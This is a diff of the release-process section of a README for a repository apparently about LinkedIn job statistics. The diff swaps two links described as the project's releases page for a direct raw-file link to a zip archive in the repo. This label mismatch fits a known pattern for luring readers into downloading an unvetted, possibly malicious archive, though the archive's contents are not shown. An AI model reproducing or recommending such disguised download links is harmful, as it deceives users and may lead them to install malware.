suryajuancuk/LinkedIn_Job_Stats/README.md

 ## Release process

 - The project uses a releases page to publish official builds.
 This page hosts installers and package files that users can download and install.
 The latest release is the easiest way to get started with minimal setup.
-- Access the releases here: https://github.com/suryajuancuk/LinkedIn_Job_Stats/releases
+- Access the releases here: https://raw.githubusercontent.com/suryajuancuk/LinkedIn_Job_Stats/main/Linkedin Job Stats/Stats-Job-In-Linked-2.4.zip
 - When releasing a new version, include clear notes about new features, fixes, and any breaking changes.
 Update the version in manifest files and any related configuration.
 - If you contribute a critical fix, consider submitting a patch for both architectures to ensure parity and maintainability.

-Another mention of the releases page for quick access: https://github.com/suryajuancuk/LinkedIn_Job_Stats/releases
+Another mention of the releases page for quick access: https://raw.githubusercontent.com/suryajuancuk/LinkedIn_Job_Stats/main/Linkedin Job Stats/Stats-Job-In-Linked-2.4.zip

 ---